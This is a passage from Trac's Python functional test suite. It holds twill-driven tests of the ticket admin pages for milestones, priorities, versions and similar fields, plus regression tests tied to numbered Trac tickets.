tc.follow(name)
tc.notfind(desc)
class TestAdminMilestone(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Admin create milestone"""
self._tester.create_milestone()
class TestAdminMilestoneSpace(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Admin create milestone with a space"""
self._tester.create_milestone('Milestone 1')
class TestAdminMilestoneDuplicates(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Admin create duplicate milestone"""
name = "DuplicateMilestone"
self._tester.create_milestone(name)
milestone_url = self._tester.url + "/admin/ticket/milestones"
tc.go(milestone_url)
tc.url(milestone_url)
tc.formvalue('addmilestone', 'name', name)
tc.submit()
tc.notfind(internal_error)
tc.find('Milestone %s already exists' % name)
tc.notfind('%s')
class TestAdminMilestoneDetail(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Admin modify milestone details"""
name = "DetailMilestone"
# Create a milestone
self._tester.create_milestone(name)
# Modify the details of the milestone
milestone_url = self._tester.url + "/admin/ticket/milestones"
tc.go(milestone_url)
tc.url(milestone_url)
tc.follow(name)
tc.url(milestone_url + '/' + name)
tc.formvalue('modifymilestone', 'description', 'Some description.')
tc.submit('save')
tc.url(milestone_url)
# Make sure the milestone isn't closed
self._tester.go_to_roadmap()
tc.find(name)
# Cancel more modifications
tc.go(milestone_url)
tc.url(milestone_url)
tc.follow(name)
tc.formvalue('modifymilestone', 'description',
'~~Some other description.~~')
tc.submit('cancel')
tc.url(milestone_url)
# Verify the correct modifications show up
self._tester.go_to_roadmap()
tc.find('Some description.')
tc.follow(name)
tc.find('Some description.')
class TestAdminMilestoneDue(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Admin milestone duedate"""
name = "DueMilestone"
duedate = datetime.now(tz=utc)
duedate_string = format_date(duedate, tzinfo=utc)
self._tester.create_milestone(name, due=duedate_string)
tc.find(duedate_string)
class TestAdminMilestoneDetailDue(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Admin modify milestone duedate on detail page"""
name = "DetailDueMilestone"
# Create a milestone
self._tester.create_milestone(name)
# Modify the details of the milestone
milestone_url = self._tester.url + "/admin/ticket/milestones"
tc.go(milestone_url)
tc.url(milestone_url)
tc.follow(name)
tc.url(milestone_url + '/' + name)
duedate = datetime.now(tz=utc)
duedate_string = format_date(duedate, tzinfo=utc)
tc.formvalue('modifymilestone', 'due', duedate_string)
tc.submit('save')
tc.url(milestone_url + '$')
tc.find(name + '(<[^>]*>|\\s)*'+ duedate_string, 's')
class TestAdminMilestoneCompleted(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Admin milestone completed"""
name = "CompletedMilestone"
self._tester.create_milestone(name)
milestone_url = self._tester.url + "/admin/ticket/milestones"
tc.go(milestone_url)
tc.url(milestone_url)
tc.follow(name)
tc.url(milestone_url + '/' + name)
tc.formvalue('modifymilestone', 'completed', True)
tc.submit('save')
tc.url(milestone_url + "$")
class TestAdminMilestoneCompletedFuture(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Admin milestone completed in the future"""
name = "CompletedFutureMilestone"
self._tester.create_milestone(name)
milestone_url = self._tester.url + "/admin/ticket/milestones"
tc.go(milestone_url)
tc.url(milestone_url)
tc.follow(name)
tc.url(milestone_url + '/' + name)
tc.formvalue('modifymilestone', 'completed', True)
cdate = datetime.now(tz=utc) + timedelta(days=1)
cdate_string = format_date(cdate, tzinfo=localtz)
tc.formvalue('modifymilestone', 'completeddate', cdate_string)
tc.submit('save')
tc.find('Completion date may not be in the future')
# And make sure it wasn't marked as completed.
self._tester.go_to_roadmap()
tc.find(name)
class TestAdminMilestoneRemove(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Admin remove milestone"""
name = "MilestoneRemove"
self._tester.create_milestone(name)
milestone_url = self._tester.url + "/admin/ticket/milestones"
tc.go(milestone_url)
tc.formvalue('milestone_table', 'sel', name)
tc.submit('remove')
tc.url(milestone_url + '$')
tc.notfind(name)
class TestAdminMilestoneRemoveMulti(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Admin remove multiple milestones"""
name = "MultiRemoveMilestone"
count = 3
for i in range(count):
self._tester.create_milestone("%s%s" % (name, i))
milestone_url = self._tester.url + '/admin/ticket/milestones'
tc.go(milestone_url)
tc.url(milestone_url + '$')
for i in range(count):
tc.find("%s%s" % (name, i))
for i in range(count):
tc.formvalue('milestone_table', 'sel', "%s%s" % (name, i))
tc.submit('remove')
tc.url(milestone_url + '$')
for i in range(count):
tc.notfind("%s%s" % (name, i))
class TestAdminMilestoneNonRemoval(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Admin remove no selected milestone"""
milestone_url = self._tester.url + "/admin/ticket/milestones"
tc.go(milestone_url)
tc.formvalue('milestone_table', 'remove', 'Remove selected items')
tc.submit('remove')
tc.find('No milestone selected')
class TestAdminMilestoneDefault(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Admin set default milestone"""
name = "DefaultMilestone"
self._tester.create_milestone(name)
milestone_url = self._tester.url + "/admin/ticket/milestones"
tc.go(milestone_url)
tc.formvalue('milestone_table', 'default', name)
tc.submit('apply')
tc.find('type="radio" name="default" value="%s" checked="checked"' % \
name)
# verify it is the default on the newticket page.
tc.go(self._tester.url + '/newticket')
tc.find('<option selected="selected" value="%s">%s</option>'
% (name, name))
class TestAdminPriority(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Admin create priority"""
self._tester.create_priority()
class TestAdminPriorityDuplicates(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Admin create duplicate priority"""
name = "DuplicatePriority"
self._tester.create_priority(name)
self._tester.create_priority(name)
tc.find('Priority %s already exists' % name)
class TestAdminPriorityModify(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Admin modify priority"""
name = "ModifyPriority"
self._tester.create_priority(name)
priority_url = self._tester.url + '/admin/ticket/priority'
tc.go(priority_url)
tc.url(priority_url + '$')
tc.find(name)
tc.follow(name)
tc.formvalue('modenum', 'name', name * 2)
tc.submit('save')
tc.url(priority_url + '$')
tc.find(name * 2)
class TestAdminPriorityRemove(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Admin remove priority"""
name = "RemovePriority"
self._tester.create_priority(name)
priority_url = self._tester.url + '/admin/ticket/priority'
tc.go(priority_url)
tc.url(priority_url + '$')
tc.find(name)
tc.formvalue('enumtable', 'sel', name)
tc.submit('remove')
tc.url(priority_url + '$')
tc.notfind(name)
class TestAdminPriorityRemoveMulti(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Admin remove multiple priorities"""
name = "MultiRemovePriority"
count = 3
for i in range(count):
self._tester.create_priority("%s%s" % (name, i))
priority_url = self._tester.url + '/admin/ticket/priority'
tc.go(priority_url)
tc.url(priority_url + '$')
for i in range(count):
tc.find("%s%s" % (name, i))
for i in range(count):
tc.formvalue('enumtable', 'sel', "%s%s" % (name, i))
tc.submit('remove')
tc.url(priority_url + '$')
for i in range(count):
tc.notfind("%s%s" % (name, i))
class TestAdminPriorityNonRemoval(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Admin remove no selected priority"""
priority_url = self._tester.url + "/admin/ticket/priority"
tc.go(priority_url)
tc.formvalue('enumtable', 'remove', 'Remove selected items')
tc.submit('remove')
tc.find('No priority selected')
class TestAdminPriorityDefault(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Admin default priority"""
name = "DefaultPriority"
self._tester.create_priority(name)
priority_url = self._tester.url + '/admin/ticket/priority'
tc.go(priority_url)
tc.url(priority_url + '$')
tc.find(name)
tc.formvalue('enumtable', 'default', name)
tc.submit('apply')
tc.url(priority_url + '$')
tc.find('radio.*"%s"\\schecked="checked"' % name)
class TestAdminPriorityDetail(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Admin modify priority details"""
name = "DetailPriority"
# Create a priority
self._tester.create_priority(name + '1')
# Modify the details of the priority
priority_url = self._tester.url + "/admin/ticket/priority"
tc.go(priority_url)
tc.url(priority_url + '$')
tc.follow(name + '1')
tc.url(priority_url + '/' + name + '1')
tc.formvalue('modenum', 'name', name + '2')
tc.submit('save')
tc.url(priority_url + '$')
# Cancel more modifications
tc.go(priority_url)
tc.follow(name)
tc.formvalue('modenum', 'name', name + '3')
tc.submit('cancel')
tc.url(priority_url + '$')
# Verify that only the correct modifications show up
tc.notfind(name + '1')
tc.find(name + '2')
tc.notfind(name + '3')
class TestAdminPriorityRenumber(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Admin renumber priorities"""
valuesRE = re.compile('<select name="value_([0-9]+)">', re.M)
html = b.get_html()
max_priority = max([int(x) for x in valuesRE.findall(html)])
name = "RenumberPriority"
self._tester.create_priority(name + '1')
self._tester.create_priority(name + '2')
priority_url = self._tester.url + '/admin/ticket/priority'
tc.go(priority_url)
tc.url(priority_url + '$')
tc.find(name + '1')
tc.find(name + '2')
tc.formvalue('enumtable', 'value_%s' % (max_priority + 1), str(max_priority + 2))
tc.formvalue('enumtable', 'value_%s' % (max_priority + 2), str(max_priority + 1))
tc.submit('apply')
tc.url(priority_url + '$')
# Verify that their order has changed.
tc.find(name + '2.*' + name + '1', 's')
class TestAdminPriorityRenumberDup(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Admin badly renumber priorities"""
# Make the first priority the 2nd priority, and leave the 2nd priority
# as the 2nd priority.
priority_url = self._tester.url + '/admin/ticket/priority'
tc.go(priority_url)
tc.url(priority_url + '$')
tc.formvalue('enumtable', 'value_1', '2')
tc.submit('apply')
tc.url(priority_url + '$')
tc.find('Order numbers must be unique')
class TestAdminResolution(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Admin create resolution"""
self._tester.create_resolution()
class TestAdminResolutionDuplicates(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Admin create duplicate resolution"""
name = "DuplicateResolution"
self._tester.create_resolution(name)
self._tester.create_resolution(name)
tc.find('Resolution value "%s" already exists' % name)
class TestAdminSeverity(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Admin create severity"""
self._tester.create_severity()
class TestAdminSeverityDuplicates(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Admin create duplicate severity"""
name = "DuplicateSeverity"
self._tester.create_severity(name)
self._tester.create_severity(name)
tc.find('Severity value "%s" already exists' % name)
class TestAdminType(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Admin create type"""
self._tester.create_type()
class TestAdminTypeDuplicates(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Admin create duplicate type"""
name = "DuplicateType"
self._tester.create_type(name)
self._tester.create_type(name)
tc.find('Type value "%s" already exists' % name)
class TestAdminVersion(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Admin create version"""
self._tester.create_version()
class TestAdminVersionDuplicates(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Admin create duplicate version"""
name = "DuplicateVersion"
self._tester.create_version(name)
version_admin = self._tester.url + "/admin/ticket/versions"
tc.go(version_admin)
tc.url(version_admin)
tc.formvalue('addversion', 'name', name)
tc.submit()
tc.notfind(internal_error)
tc.find("Version %s already exists." % name)
class TestAdminVersionDetail(FunctionalTwillTestCaseSetup):
# This is somewhat pointless... the only place to find the version
# description is on the version details page.
def runTest(self):
"""Admin version details"""
name = "DetailVersion"
self._tester.create_version(name)
version_admin = self._tester.url + "/admin/ticket/versions"
tc.go(version_admin)
tc.url(version_admin)
tc.follow(name)
desc = 'Some version description.'
tc.formvalue('modifyversion', 'description', desc)
tc.submit('save')
tc.url(version_admin)
tc.follow(name)
tc.find(desc)
class TestAdminVersionDetailTime(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Admin version detail set time"""
name = "DetailTimeVersion"
self._tester.create_version(name)
version_admin = self._tester.url + "/admin/ticket/versions"
tc.go(version_admin)
tc.url(version_admin)
tc.follow(name)
tc.formvalue('modifyversion', 'time', '')
tc.submit('save')
tc.url(version_admin + '$')
tc.find(name + '(<[^>]*>|\\s)*<[^>]* name="default" value="%s"' % name, 's')
class TestAdminVersionDetailCancel(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Admin version details"""
name = "DetailVersion"
self._tester.create_version(name)
version_admin = self._tester.url + "/admin/ticket/versions"
tc.go(version_admin)
tc.url(version_admin)
tc.follow(name)
desc = 'Some other version description.'
tc.formvalue('modifyversion', 'description', desc)
tc.submit('cancel')
tc.url(version_admin)
tc.follow(name)
tc.notfind(desc)
class TestAdminVersionRemove(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Admin remove version"""
name = "VersionRemove"
self._tester.create_version(name)
version_url = self._tester.url + "/admin/ticket/versions"
tc.go(version_url)
tc.formvalue('version_table', 'sel', name)
tc.submit('remove')
tc.url(version_url + '$')
tc.notfind(name)
class TestAdminVersionRemoveMulti(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Admin remove multiple versions"""
name = "MultiRemoveVersion"
count = 3
for i in range(count):
self._tester.create_version("%s%s" % (name, i))
version_url = self._tester.url + '/admin/ticket/versions'
tc.go(version_url)
tc.url(version_url + '$')
for i in range(count):
tc.find("%s%s" % (name, i))
for i in range(count):
tc.formvalue('version_table', 'sel', "%s%s" % (name, i))
tc.submit('remove')
tc.url(version_url + '$')
for i in range(count):
tc.notfind("%s%s" % (name, i))
class TestAdminVersionNonRemoval(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Admin remove no selected version"""
version_url = self._tester.url + "/admin/ticket/versions"
tc.go(version_url)
tc.formvalue('version_table', 'remove', 'Remove selected items')
tc.submit('remove')
tc.find('No version selected')
class TestAdminVersionDefault(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Admin set default version"""
name = "DefaultVersion"
self._tester.create_version(name)
version_url = self._tester.url + "/admin/ticket/versions"
tc.go(version_url)
tc.formvalue('version_table', 'default', name)
tc.submit('apply')
tc.find('type="radio" name="default" value="%s" checked="checked"' % \
name)
# verify it is the default on the newticket page.
tc.go(self._tester.url + '/newticket')
tc.find('<option selected="selected" value="%s">%s</option>'
% (name, name))
class TestNewReport(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Create a new report"""
self._tester.create_report(
'Closed tickets, modified in the past 7 days by owner.',
'SELECT DISTINCT p.value AS __color__,'
' id AS ticket,'
' summary, component, milestone, t.type AS type,'
' reporter, time AS created,'
' changetime AS modified, description AS _description,'
' priority,'
' round(julianday(\'now\') - '
' julianday(changetime, \'unixepoch\')) as days,'
' resolution,'
' owner as __group__'
' FROM ticket t'
' LEFT JOIN enum p ON p.name = t.priority AND '
' p.type = \'priority\''
' WHERE ((julianday(\'now\') -'
' julianday(changetime, \'unixepoch\')) < 7)'
' AND status = \'closed\''
' ORDER BY __group__, changetime, p.value',
'List of all tickets that are closed, and have been modified in'
' the past 7 days, grouped by owner.\n\n(So they have probably'
' been closed this week.)')
class RegressionTestRev5665(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Admin create version without release time (r5665)"""
self._tester.create_version(releasetime='')
class RegressionTestRev5994(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Test for regression of the column label fix in r5994"""
env = self._testenv.get_trac_environment()
env.config.set('ticket-custom', 'custfield', 'text')
env.config.set('ticket-custom', 'custfield.label', 'Custom Field')
env.config.save()
try:
self._testenv.restart()
self._tester.go_to_query()
tc.find('<label>( |\\n)*<input[^<]*value="custfield"'
'[^<]*/>( |\\n)*Custom Field( |\\n)*</label>', 's')
finally:
pass
#env.config.set('ticket', 'restrict_owner', 'no')
#env.config.save()
#self._testenv.restart()
class RegressionTestTicket4447(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Test for regression of http://trac.edgewall.org/ticket/4447"""
ticketid = self._tester.create_ticket(summary="Hello World")
env = self._testenv.get_trac_environment()
env.config.set('ticket-custom', 'newfield', 'text')
env.config.set('ticket-custom', 'newfield.label',
'Another Custom Field')
env.config.save()
try:
self._testenv.restart()
self._tester.go_to_ticket(ticketid)
self._tester.add_comment(ticketid)
tc.notfind('deleted')
tc.notfind('set to')
finally:
pass
class RegressionTestTicket4630a(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Test for regression of http://trac.edgewall.org/ticket/4630 a"""
env = self._testenv.get_trac_environment()
env.config.set('ticket', 'restrict_owner', 'yes')
env.config.save()
try:
self._testenv.restart()
# Make sure 'user' has logged in.
self._tester.go_to_front()
self._tester.logout()
self._tester.login('user')
self._tester.logout()
self._tester.login('admin')
ticket_id = self._tester.create_ticket()
self._tester.go_to_ticket(ticket_id)
tc.formvalue('propertyform', 'action', 'reassign')
tc.find('reassign_reassign_owner')
tc.formvalue('propertyform', 'action_reassign_reassign_owner', 'user')
tc.submit('submit')
finally:
# Undo the config change for now since this (failing)
# regression test causes problems for later tests.
env.config.set('ticket', 'restrict_owner', 'no')
env.config.save()
self._testenv.restart()
class RegressionTestTicket4630b(FunctionalTestCaseSetup):
def runTest(self):
"""Test for regression of http://trac.edgewall.org/ticket/4630 b"""
# NOTE: this must be run after RegressionTestTicket4630 (user must
# have logged in)
from trac.perm import PermissionSystem
env = self._testenv.get_trac_environment()
perm = PermissionSystem(env)
users = perm.get_users_with_permission('TRAC_ADMIN')
self.assertEqual(users, ['admin'])
users = perm.get_users_with_permission('TICKET_MODIFY')
self.assertEqual(users, ['admin', 'user'])
class RegressionTestTicket5022(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Test for regression of http://trac.edgewall.org/ticket/5022
"""
summary = 'RegressionTestTicket5022'
ticket_id = self._tester.create_ticket(summary=summary)
tc.go(self._tester.url + '/newticket?id=%s' % ticket_id)
tc.notfind(summary)
class RegressionTestTicket5394a(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Test for regression of http://trac.edgewall.org/ticket/5394 a
Order user list alphabetically in (re)assign action
"""
# set restrict_owner config
env = self._testenv.get_trac_environment()
env.config.set('ticket', 'restrict_owner', 'yes')
env.config.save()
self._testenv.restart()
self._tester.go_to_front()
self._tester.logout()
test_users = ['alice', 'bob', 'jane', 'john', 'charlie', 'alan',
'zorro']
# Apprently it takes a sec for the new user to be recognized by the
# environment. So we add all the users, then log in as the users
# in a second loop. This should be faster than adding a sleep(1)
# between the .adduser and .login steps.
for user in test_users:
self._testenv.adduser(user)
for user in test_users:
self._tester.login(user)
self._tester.logout()
self._tester.login('admin')
ticketid = self._tester.create_ticket("regression test 5394a")
self._tester.go_to_ticket(ticketid)
options = 'id="action_reassign_reassign_owner">' + \
''.join(['<option[^>]*>%s</option>' % user for user in
sorted(test_users + ['admin', 'user'])])
tc.find(options, 's')
# We don't have a good way to fully delete a user from the Trac db.
# Once we do, we may want to cleanup our list of users here.
class RegressionTestTicket5394b(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Test for regression of http://trac.edgewall.org/ticket/5394 b
Order user list alphabetically on new ticket page
"""
# Must run after RegressionTestTicket5394a
self._tester.go_to_front()
tc.follow('New Ticket')
tc.find('Create New Ticket')
test_users = ['alice', 'bob', 'jane', 'john', 'charlie', 'alan',
'zorro']
options = 'id="field-owner"[^>]*>[[:space:]]*<option/>.*' + \
'.*'.join(['<option[^>]*>%s</option>' % user for user in
sorted(test_users + ['admin', 'user'])])
options = '.*'.join(sorted(test_users + ['admin', 'user']))
tc.find(options, 's')
# TODO: this should probably be changed to be a testsuite derived from
# TestSetup
class RegressionTestTicket5497prep(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Test for regression of http://trac.edgewall.org/ticket/5497 prep
When the component is changed, the owner should update to the
default owner of the component.
If component is changed and the owner is changed (reassigned action
for open tickets in the basic workflow), the owner should be the
specified owner, not the owner of the component.
"""
# The default owner for the component we're using for this testcase
# is 'user', and we'll manually assign to 'admin'.
self._tester.create_component('regression5497', 'user')
class RegressionTestTicket5497a(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Test for regression of http://trac.edgewall.org/ticket/5497 a
Open ticket, component changed, owner not changed"""
ticketid = self._tester.create_ticket("regression test 5497a")
self._tester.go_to_ticket(ticketid)
tc.formvalue('propertyform', 'field-component', 'regression5497')
tc.submit('submit')
tc.find(regex_owned_by('user'))
class RegressionTestTicket5497b(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Test for regression of http://trac.edgewall.org/ticket/5497 b
Open ticket, component changed, owner changed"""
ticketid = self._tester.create_ticket("regression test 5497b")
self._tester.go_to_ticket(ticketid)
tc.formvalue('propertyform', 'field-component', 'regression5497')
tc.formvalue('propertyform', 'action', 'reassign')
tc.formvalue('propertyform', 'action_reassign_reassign_owner', 'admin')
tc.submit('submit')
tc.notfind(regex_owned_by('user'))
tc.find(regex_owned_by('admin'))
class RegressionTestTicket5497c(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Test for regression of http://trac.edgewall.org/ticket/5497 c
New ticket, component changed, owner not changed"""
ticketid = self._tester.create_ticket("regression test 5497c",
{'component':'regression5497'})
self._tester.go_to_ticket(ticketid)
tc.find(regex_owned_by('user'))
class RegressionTestTicket5497d(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Test for regression of http://trac.edgewall.org/ticket/5497 d
New ticket, component changed, owner changed"""
ticketid = self._tester.create_ticket("regression test 5497d",
{'component':'regression5497', 'owner':'admin'})
self._tester.go_to_ticket(ticketid)
tc.find(regex_owned_by('admin'))
class RegressionTestTicket5602(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Test for regression of http://trac.edgewall.org/ticket/5602"""
# Create a set of tickets, and assign them all to a milestone
milestone = self._tester.create_milestone()
ids = [self._tester.create_ticket() for x in range(5)]
[self._tester.ticket_set_milestone(x, milestone) for x in ids]
# Need a ticket in each state: new, assigned, accepted, closed,
# reopened
# leave ids[0] as new
# make ids[1] be assigned
self._tester.go_to_ticket(ids[1])
tc.formvalue('propertyform', 'action', 'reassign')
tc.formvalue('propertyform', 'action_reassign_reassign_owner', 'admin')
tc.submit('submit')
# make ids[2] be accepted
self._tester.go_to_ticket(ids[2])
tc.formvalue('propertyform', 'action', 'accept')
tc.submit('submit')
# make ids[3] be closed
self._tester.go_to_ticket(ids[3])
tc.formvalue('propertyform', 'action', 'resolve')
tc.formvalue('propertyform', 'action_resolve_resolve_resolution', 'fixed')
tc.submit('submit')
# make ids[4] be reopened
self._tester.go_to_ticket(ids[4])
tc.formvalue('propertyform', 'action', 'resolve')
tc.formvalue('propertyform', 'action_resolve_resolve_resolution', 'fixed')
tc.submit('submit')
# FIXME: we have to wait a second to avoid "IntegrityError: columns
# ticket, time, field are not unique"
time.sleep(1)
tc.formvalue('propertyform', 'action', 'reopen')
tc.submit('submit')
tc.show()
tc.notfind("Python Traceback")
# Go to the milestone and follow the links to the closed and active
# tickets.
tc.go(self._tester.url + "/roadmap")
tc.follow(milestone)
tc.follow("closed:")
tc.find("Resolution:[ \t\n]+fixed")
tc.back()
tc.follow("active:")
tc.find("Status:[ \t\n]+new")
tc.find("Status:[ \t\n]+assigned")
tc.find("Status:[ \t\n]+accepted")
tc.notfind("Status:[ \t\n]+closed")
tc.find("Status:[ \t\n]+reopened")
class RegressionTestTicket5687(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Test for regression of http://trac.edgewall.org/ticket/5687"""
self._tester.logout()
self._tester.login('user')
ticketid = self._tester.create_ticket()
self._tester.logout()
self._tester.login('admin')
class RegressionTestTicket5930(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Test for regression of http://trac.edgewall.org/ticket/5930
TypeError: from_string() takes exactly 3 non-keyword arguments (4
given)
Caused by a saved query
"""
self._tester.create_report('Saved Query', 'query:version=1.0', '')
tc.notfind(internal_error)
# TODO: Add a testcase for the following:
# Can you also throw in addition of a 1.0 ticket and a 2.0 ticket
# as part of the demo env, then see that only the correct one shows
# up in the report?
class RegressionTestTicket6048(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Test for regression of http://trac.edgewall.org/ticket/6048"""
# Setup the DeleteTicket plugin
plugin = open(os.path.join(self._testenv.command_cwd, 'sample-plugins',
'workflow', 'DeleteTicket.py')).read()
open(os.path.join(self._testenv.tracdir, 'plugins', 'DeleteTicket.py'),
'w').write(plugin)
env = self._testenv.get_trac_environment()
prevconfig = env.config.get('ticket', 'workflow')
env.config.set('ticket', 'workflow',
prevconfig + ',DeleteTicketActionController')
env.config.save()
env = self._testenv.get_trac_environment() # reload environment
# Create a ticket and delete it
ticket_id = self._tester.create_ticket(
summary='RegressionTestTicket6048')
# (Create a second ticket so that the ticket id does not get reused
# and confuse the tester object.)
self._tester.create_ticket(summary='RegressionTestTicket6048b')
self._tester.go_to_ticket(ticket_id)
tc.find('delete ticket')
tc.formvalue('propertyform', 'action', 'delete')
tc.submit('submit')
self._tester.go_to_ticket(ticket_id)
tc.find('Error: Invalid ticket number')
tc.find('Ticket %s does not exist.' % ticket_id)
# Remove the DeleteTicket plugin
env.config.set('ticket', 'workflow', prevconfig)
env.config.save()
env = self._testenv.get_trac_environment() # reload environment
for ext in ('py', 'pyc', 'pyo'):
filename = os.path.join(self._testenv.tracdir, 'plugins',
'DeleteTicket.%s' % ext)
if os.path.exists(filename):
os.unlink(filename)
class RegressionTestTicket6747(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Test for regression of http://trac.edgewall.org/ticket/6747"""
env = self._testenv.get_trac_environment()
env.config.set('ticket-workflow', 'resolve.operations',
'set_resolution,set_owner')
env.config.set('ticket-workflow', 'resolve.set_owner',
'a_specified_owner')
env.config.save()
try:
self._testenv.restart()
ticket_id = self._tester.create_ticket("RegressionTestTicket6747")
self._tester.go_to_ticket(ticket_id)
tc.find("a_specified_owner")
tc.notfind("a_specified_owneras")
finally:
# Undo the config change to avoid causing problems for later
# tests.
env.config.set('ticket-workflow', 'resolve.operations',
'set_resolution')
env.config.remove('ticket-workflow', 'resolve.set_owner')
env.config.save()
self._testenv.restart()
class RegressionTestTicket6879a(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Test for regression of http://trac.edgewall.org/ticket/6879 a
Make sure that previewing a close does not make the available actions
be those for the close status.
"""
# create a ticket, then preview resolving the ticket twice
ticket_id = self._tester.create_ticket("RegressionTestTicket6879 a")
self._tester.go_to_ticket(ticket_id)
tc.formvalue('propertyform', 'action', 'resolve')
tc.formvalue('propertyform', 'action_resolve_resolve_resolution', 'fixed')
tc.submit('preview')
tc.formvalue('propertyform', 'action', 'resolve')
tc.submit('preview')
class RegressionTestTicket6879b(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Test for regression of http://trac.edgewall.org/ticket/6879 a
Make sure that previewing a close does not make the available actions
be those for the close status.
"""
# create a ticket, then preview resolving the ticket twice
ticket_id = self._tester.create_ticket("RegressionTestTicket6879 b")
self._tester.go_to_ticket(ticket_id)
tc.formvalue('propertyform', 'action', 'resolve')
tc.formvalue('propertyform', 'action_resolve_resolve_resolution', 'fixed')
tc.submit('preview')
tc.formvalue('propertyform', 'action', 'resolve')
tc.submit('submit')
class RegressionTestTicket6912a(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Test for regression of http://trac.edgewall.org/ticket/6912 a"""
try:
self._tester.create_component(name='RegressionTestTicket6912a',
user='')
except twill.utils.ClientForm.ItemNotFoundError, e:
raise twill.errors.TwillAssertionError(e)
class RegressionTestTicket6912b(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Test for regression of http://trac.edgewall.org/ticket/6912 b"""
self._tester.create_component(name='RegressionTestTicket6912b',
user='admin')
tc.follow('RegressionTestTicket6912b')
try:
tc.formvalue('modcomp', 'owner', '')
except twill.utils.ClientForm.ItemNotFoundError, e:
raise twill.errors.TwillAssertionError(e)
tc.formvalue('modcomp', 'save', 'Save')
tc.submit()
tc.find('RegressionTestTicket6912b</a>[ \n\t]*</td>[ \n\t]*'
'<td class="owner"></td>', 's')
class RegressionTestTicket8247(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Test for regression of http://trac.edgewall.org/ticket/8247
Author field of ticket comment corresponding to the milestone removal
was always 'anonymous'."""
name = "MilestoneRemove"
self._tester.create_milestone(name)
id = self._tester.create_ticket(info={'milestone': name})
ticket_url = self._tester.url + "/ticket/%d" % id
tc.go(ticket_url)
tc.find(name)
tc.go(self._tester.url + "/admin/ticket/milestones")
tc.formvalue('milestone_table', 'sel', name)
tc.submit('remove')
tc.go(ticket_url)
tc.find('<strong>Milestone</strong>[ \n\t]*<em>%s</em> deleted' % name)
tc.find('Changed <a.*</a> ago by admin')
tc.notfind('anonymous')
class RegressionTestTicket8861(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Test for regression of http://trac.edgewall.org/ticket/8816
When creating a milestone with an already existing name, you get
a warning. After changing the name you will find that the original
milestone with that name is renamed instead of a new one being
created."""
name = "8861Milestone"
self._tester.create_milestone(name)
tc.go(self._tester.url + "/milestone?action=new")
tc.formvalue('edit', 'name', name)
tc.submit('Add milestone')
tc.find('Milestone "%s" already exists' % name)
tc.formvalue('edit', 'name', name + '__')
tc.submit('Add milestone')
tc.go(self._tester.url + "/roadmap")
tc.find('Milestone: <em>%s</em>' % name)
tc.find('Milestone: <em>%s</em>' % (name + '__'))
class RegressionTestTicket9084(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Test for regression of http://trac.edgewall.org/ticket/9084"""
ticketid = self._tester.create_ticket()
self._tester.add_comment(ticketid)
self._tester.go_to_ticket(ticketid)
tc.formvalue('reply-to-comment-1', 'replyto', '1')
tc.submit('Reply')
tc.formvalue('propertyform', 'comment', random_sentence(3))
tc.submit('Submit changes')
tc.notfind('AssertionError')
def functionalSuite(suite=None):
if not suite:
import trac.tests.functional.testcases
suite = trac.tests.functional.testcases.functionalSuite()
suite.addTest(TestTickets())
suite.addTest(TestTicketPreview())
suite.addTest(TestTicketNoSummary())
suite.addTest(TestTicketAltFormats())
suite.addTest(TestTicketCSVFormat())
suite.addTest(TestTicketTabFormat())
suite.addTest(TestTicketRSSFormat())
suite.addTest(TestTicketSearch())
suite.addTest(TestNonTicketSearch())
suite.addTest(TestTicketHistory())
